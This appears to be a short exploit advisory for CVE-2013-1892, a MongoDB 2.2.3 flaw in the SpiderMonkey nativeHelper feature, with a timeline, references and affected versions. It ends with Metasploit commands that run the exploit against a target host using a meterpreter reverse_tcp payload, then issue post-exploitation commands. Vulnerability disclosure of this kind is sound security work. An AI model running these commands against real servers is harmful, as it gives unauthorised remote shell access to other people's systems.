Timeline :
Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix on 2013-03-24
Metasploit PoC provided on 2013-03-27
PoC provided by :
Reference(s) :
CVE-2013-1892
OSVDB-91632
BID-58695
Affected version(s) :
MongoDB 2.2.3 and previous
Tested on Ubuntu 10.04 x86 with :
MongoDB 2.2.3
Description :
This module exploits the nativeHelper feature from SpiderMonkey, which allows control of execution when it is called with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.
Commands :
use exploit/linux/misc/mongod_native_helper
set RHOST 192.168.178.53
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
sysinfo
getuid